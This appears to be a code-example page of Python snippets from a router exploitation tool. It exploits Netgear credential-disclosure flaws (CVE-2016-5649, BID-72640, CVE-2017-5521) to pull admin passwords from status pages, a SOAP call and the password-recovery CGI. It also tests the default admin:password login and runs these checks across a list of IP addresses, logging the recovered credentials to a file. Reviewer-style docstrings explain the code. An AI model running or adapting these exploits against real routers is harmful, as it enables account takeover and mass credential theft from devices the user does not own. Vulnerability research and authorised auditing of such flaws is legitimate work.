Esempio n. 1
0
def cve_2016_5649(router):
    """Check *router* for CVE-2016-5649 (admin password readable from a status page).

    Fetches ``/BSW_cxttongr.htm`` from ``router.url``, collects every ``<b>``
    element found inside a table row and reads the first double-quoted string
    of the second collected entry as the password.  On success the (masked)
    username and the password are printed, ``router.exploit``,
    ``router.username``, ``router.password`` and ``router.vulnerable`` are set
    and 1 is returned; on any failure ``router.exploit`` / ``router.vulnerable``
    are reset and 0 is returned.

    Note: the HTTP request is outside the ``try`` block and has no timeout, so
    a network error propagates to the caller (``exploit_act``) instead of being
    reported as "not vulnerable".  The bare ``except`` below swallows every
    other exception, including ``KeyboardInterrupt``.
    """
    exploit = 'CVE-2016-5649'
    aux.ex_print('action', '[*] Test for vulnerability ' + exploit + ' --> ',
                 0)
    r = requests.get(router.url + '/BSW_cxttongr.htm')
    soup = BeautifulSoup(r.text, 'lxml')
    data = []
    # Keep only the rows that contain at least one <b> element.
    for table_row in soup.select("tr"):
        bdata = table_row.findAll('b')
        if len(bdata) > 0:
            data.append(bdata)
    try:
        # data[1] raises IndexError when fewer than two rows matched, and
        # re.search() returns None (-> AttributeError) when the entry holds
        # no quoted string; both land in the bare except below.
        password = re.search('"(.+?)"', str(data[1])).group(1)
        # The username is stored as a masked placeholder, not scraped.
        username = '******'
        aux.ex_print('positive', ' Vulnerable! ', 1)
        aux.ex_print('info', '\tCredentials found: ', 0)
        aux.ex_print('positive', username + ':' + password, 1)
        router.exploit = exploit
        router.username = username
        router.password = password
        router.vulnerable = True
        return 1
    except:
        aux.ex_print('error', ' NOT vulnerable', 1)
        router.exploit = 'NOT VULN'
        router.vulnerable = False
        return 0
Esempio n. 2
0
def bid_72640(router):
    """Check *router* for BID-72640 (password returned by a SOAP GetInfo call).

    POSTs a single request carrying the ``LANConfigSecurity#GetInfo``
    ``SOAPAction`` header -- and no credentials -- to ``router.url + '/'`` and
    looks for a ``<NewPassword>`` element in the reply.  When found, the
    (masked) username and the password are printed, stored on *router*,
    ``router.vulnerable`` is set and 1 is returned; otherwise 0.

    Note: ``requests.post`` sits outside the ``try`` block, so connection
    errors propagate to the caller.  The bare ``except`` covers the
    ``AttributeError`` raised when the regex finds no match, but also every
    other exception, including ``KeyboardInterrupt``.
    """
    username = '******'
    password = ""
    exploit = 'BID-72640'
    aux.ex_print('action', '[*] Test for vulnerability ' + exploit + ' --> ',
                 0)
    headers = {
        'SOAPAction': 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo',
        'Content-Type': 'application/x-www-form-urlencoded',
        # 'Content - Length' (with spaces) is not the standard Content-Length
        # header name; requests derives the real Content-Length from ``data``.
        'Content - Length': '1'
    }
    # The body is this literal string, not a SOAP envelope.
    data = 'POST / HTTP/1.1'
    r = requests.post(router.url + '/', headers=headers, data=data)
    try:
        password = re.search('<NewPassword>(.+?)</NewPassword>',
                             str(r.content)).group(1)
    except:
        aux.ex_print('error', ' NOT vulnerable', 1)
        return 0
    else:
        aux.ex_print('positive', ' Vulnerable! ', 1)
        aux.ex_print('info', '\tCredentials found: ', 0)
        aux.ex_print('positive', username + ':' + password, 1)
        router.exploit = exploit
        router.username = username
        router.password = password
        router.vulnerable = True
        return 1
Esempio n. 3
0
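def exploit_act(router):
    """Dispatch the handler registered for ``router.model`` in ``exploits``.

    Args:
        router: object whose ``model`` attribute selects the handler; the
            handler is called with *router* and is expected to return 0 or 1.

    Returns:
        The handler's return value, or 0 when no handler exists for the model
        or the handler raised.  ``router.exploit`` is set to ``'NO EXP'`` in
        the first failure case and to ``'NOT VULN'`` in the second.
    """
    model = router.model
    if model not in exploits:
        aux.ex_print('error', '\t[-] Exploit NOT found for this model', 1)
        router.exploit = 'NO EXP'
        return 0
    try:
        return exploits[model](router)
    except Exception:
        # Narrowed from a bare ``except`` so that KeyboardInterrupt /
        # SystemExit are no longer reported as "NOT vulnerable".
        aux.ex_print('error', '\t[-] NOT vulnerable', 1)
        router.exploit = 'NOT VULN'
        return 0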
Esempio n. 4
0
def ng_login1(router):
    """Check whether *router* accepts the default Basic-auth credentials.

    Sends one GET to ``router.url + '/'`` with a fixed ``Authorization``
    header (the base64 form of ``admin:password``, see the comment below)
    and treats an HTTP 200 reply as a successful login.  On success
    ``router.default_login``, ``router.vulnerable``, ``router.exploit`` and
    masked ``username`` / ``password`` placeholders are set and 1 is returned;
    otherwise 0.

    Note: ``verify=False`` disables TLS certificate validation for https
    targets.  NOTE(review): a 200 status alone is taken as proof of login;
    a device that answers 200 with its login form would be misreported here
    -- confirm against the target.
    """
    #  Test admin:password,  passed as a base64 encoded string
    headers = {
        "User-Agent":
        "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0",
        "Accept":
        "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Authorization": "Basic YWRtaW46cGFzc3dvcmQ=",
        "DNT": "1",
        "Connection": "close",
        "Cache-Control": "max-age=0"
    }
    # No timeout is set on this request; a silent target blocks the caller.
    if requests.get(router.url + '/', headers=headers,
                    verify=False).status_code == requests.codes.ok:
        aux.ex_print('info', '\tDefault credentials in use: ', 0)
        aux.ex_print('positive', 'admin:password', 1)
        router.default_login = True
        # Stored masked; the real values are only printed above.
        router.username = '******'
        router.password = '******'
        router.vulnerable = True
        router.exploit = "Default PWD"
        return 1
    else:
        aux.ex_print('error', '\t[-] Default credentials not in use', 1)
        return 0
Esempio n. 5
0
 def __init__(self, opt):
     """Probe ``opt.ip`` for a web server on the default ports.

     Records the target IP, starts with an empty ``open_ports`` list, prints
     the target and delegates detection to ``__check_webserver``; a return
     value of 0 from it is reported as "Brand/Model not found".

     NOTE(review): attributes read later by the caller (``vulnerable``,
     ``model``, ``port``, ``exploit``) are not initialised here -- confirm
     the class provides defaults for them.
     """
     target = opt.ip
     self.ip = target
     self.open_ports = []
     aux.ex_print('info', '\nTesting: ' + target, 1)
     aux.ex_print('action',
                  '[*] Try to detect web server on default ports...', 1)
     detected = self.__check_webserver(opt)
     if detected == 0:
         aux.ex_print('error', '\t[-] Brand/Model not found! ', '1')
Esempio n. 6
0
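if args.output_file:
	opt.o_file = True
	opt.o_file_name = args.output_file

aux.banner(__version__)
if opt.single_ip:
	router = classes.Router(opt)
	del router
else:
	# Count the targets once; the original re-read the whole list file on
	# every iteration just to print "x of N".
	total = aux.file_len(opt.list_file)
	with open(opt.list_file, 'r') as ip_list:
		for i, line in enumerate(ip_list, start=1):
			# strip() also drops a trailing '\r' from CRLF lists.
			opt.ip = line.strip()
			aux.ex_print("info", "Processing IP number " + str(i) + " of " + str(total), 1)
			router = classes.Router(opt)
			router.open_ports = []
			# Write the result to the outfile even when the router is not exploitable.
			# The handle is opened and closed per record: the original reopened it
			# every iteration without closing (leaking handles) and then called
			# output.close() after the loop, which raised NameError when no outfile
			# had been requested.
			if opt.o_file:
				with open(opt.o_file_name, 'a') as output:
					if router.vulnerable:
						output.write(router.model + ',' + router.ip + ',' + router.port + ',' + str(
							router.vulnerable) + ',' + router.exploit + ',' + router.username + ',' + router.password + '\n')
					elif router.model != '':
						output.write(router.model + ',' + router.ip + ',' + router.port + ',' + router.exploit + '\n')
			del router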
Esempio n. 7
0
def cve_2017_5521(router):
    """Check *router* for CVE-2017-5521 (credentials shown by the password-recovery page).

    Reads an ``id=...`` token out of ``router.body`` (the page captured
    during detection), POSTs it to ``/passwordrecovered.cgi`` and, when the
    reply contains a ``left">`` cell, scrapes the admin username and password
    out of the HTML.  On success the credentials are printed, stored on
    *router*, ``router.vulnerable`` is set and 1 is returned; when the reply
    lacks the marker ``router.exploit`` / ``router.vulnerable`` are reset and
    0 is returned.

    Note: the token regex runs outside any ``try``; when ``router.body``
    contains no ``id=`` text, ``re.search`` returns ``None`` and ``.group(1)``
    raises ``AttributeError`` to the caller (``exploit_act`` catches it with a
    bare ``except``).  ``verify=False`` disables TLS certificate validation.
    """
    token = ''
    exploit = 'CVE-2017-5521'
    aux.ex_print('action', '[*] Test for vulnerability ' + exploit + ' --> ',
                 0)
    # First ``id=`` occurrence in the page, captured up to the next double
    # quote.  NOTE(review): this also matches ordinary ``id="..."``
    # attributes (capturing the leading quote) -- confirm the intended
    # occurrence is the first one.
    token = re.search('id=(.+?)"', str(router.body)).group(1)
    # Always true after a successful group(1): the pattern needs at least one
    # character, so the ``else`` branch at the bottom is unreachable.
    if token != '':
        r = requests.post(router.url + '/passwordrecovered.cgi?id=' + token,
                          verify=False,
                          timeout=2)
        if r.text.find('left\">') != -1:
            # scrape() is a project helper; presumably it returns the text
            # between the two delimiters -- verify in its definition.
            username = (repr(
                scrape(r.text, 'Router Admin Username</td>', '</td>')))
            username = scrape(username, '>', '\'')
            password = (repr(
                scrape(r.text, 'Router Admin Password</td>', '</td>')))
            password = scrape(password, '>', '\'')
            # presumably scrape()'s "no match" sentinel; fall back to the
            # first/last ``left">`` cells -- confirm against scrape().
            if username == "i_dont_speak_english":
                username = (scrape(r.text[r.text.find('left\">'):-1],
                                   'left\">', '</td>'))
                password = (scrape(r.text[r.text.rfind('left\">'):-1],
                                   'left\">', '</td>'))
        else:
            aux.ex_print('error', 'NOT vulnerable', 1)
            router.exploit = 'NOT VULN'
            router.vulnerable = False
            return 0

        # html encoding pops out of nowhere, lets replace that
        # NOTE(review): as written both calls replace a character with itself
        # and change nothing; the entity decoding the comment describes
        # appears to have been lost -- verify the intended replacement.
        password = password.replace("#", "#")
        password = password.replace("&", "&")
        aux.ex_print('positive', ' Vulnerable! ', 1)
        aux.ex_print('info', '\tCredentials found: ', 0)
        aux.ex_print('positive', username + ':' + password, 1)
        router.exploit = exploit
        router.username = username
        router.password = password
        router.vulnerable = True
    else:
        aux.ex_print('error', 'NOT vulnerable', 1)
        router.exploit = 'NOT VULN'
        router.vulnerable = False
        return 0
    # return 1
    return 1
Esempio n. 8
0
def test():
    """Placeholder handler that always reports success.

    Prints a debug marker and a positive message via ``aux.ex_print``, then
    returns 1.
    """
    marker = "debug"
    print(marker)
    aux.ex_print('positive', '\tExploit!!!!', 1)
    result = 1
    return result
Esempio n. 9
0
 def __check_webserver(self, opt):
     """Find a reachable web server on the open default ports and identify it.

     Collects every port in ``self.__default_ports`` that ``__is_open``
     reports as open, then tries http and https on each until a request
     succeeds.  On the first response ``self.body``, ``self.header`` and
     ``self.url`` are set and brand detection runs: for a Netgear match the
     default-credential check and the exploit lookup are invoked, for a
     D-Link match only the model is recorded.  ``opt`` is not used here.

     Returns 1 when a web server was identified, 0 when ports were open but
     no brand/model could be identified.  Note that the "no open port" case
     below also returns 1 (see the review note there).
     """
     for t in self.__default_ports:
         if self.__is_open(t) == 1:
             self.open_ports.append(t)
     if not len(self.open_ports) > 0:
         aux.ex_print('error', '\t[-] Web server not found', '1')
         # NOTE(review): returns 1 here, the same value as the success path,
         # so the caller's ``== 0`` check does not treat this as a failure
         # -- confirm whether 0 was intended.
         return 1
     aux.ex_print('positive',
                  '\t[+] Found open ports: ' + str(self.open_ports), '1')
     protocol = ["http://", "https://"]
     # Try every combination of port/protocol to find an usable web server
     for port in self.open_ports:
         for prot in protocol:
             try:
                 url_to_test = prot + self.ip + ':' + port
                 # verify=False: TLS certificate validation is disabled, so
                 # an https probe accepts any certificate presented.
                 r = requests.get(url_to_test, verify=False, timeout=3)
             except requests.exceptions.RequestException as e:
                 # A failed probe moves on to the next protocol/port; ``e``
                 # is not reported beyond the generic message.
                 aux.ex_print('error', 'DEBUG: Error in request', 1)
                 pass
             else:
                 self.body = BeautifulSoup(r.text, 'lxml')
                 self.header = r.headers
                 # we have found a webserver on the open port
                 aux.ex_print('positive',
                              '\t[+] Found web server: ' + url_to_test, '1')
                 self.url = url_to_test
                 # try to detect if is a netgear, a dlink...
                 aux.ex_print('action',
                              '[*] Try to identify brand/model...', 1)
                 # aux.is_netgear() is evaluated twice (test + assignment);
                 # presumably a pure header lookup -- verify.
                 if aux.is_netgear(self.header) != '':
                     self.netgear = True
                     self.model = aux.is_netgear(self.header)
                     self.port = port
                     aux.ex_print('positive',
                                  '\t[+] Found Brand/Model : ' + self.model,
                                  '1')
                     aux.ex_print('action', '[*] Check default creds ...',
                                  '1')
                     if exploit.login_act(self) == 1:
                         r.close()
                         return 1
                     else:
                         aux.ex_print('action',
                                      '[*] Search for exploit ...', '1')
                         # The exploit result is not consulted here; the
                         # handlers record it on ``self`` themselves.
                         exploit.exploit_act(self)
                         r.close()
                     return 1
                 elif aux.is_dlink(self.body):
                     self.dlink = True
                     # presumably ``aux.model`` is populated by is_dlink() as
                     # a side effect -- confirm in aux.  ``self.port`` is not
                     # set on this path although the output writer reads it.
                     self.model = aux.model
                     r.close()
                     return 1
                 r.close()
     return 0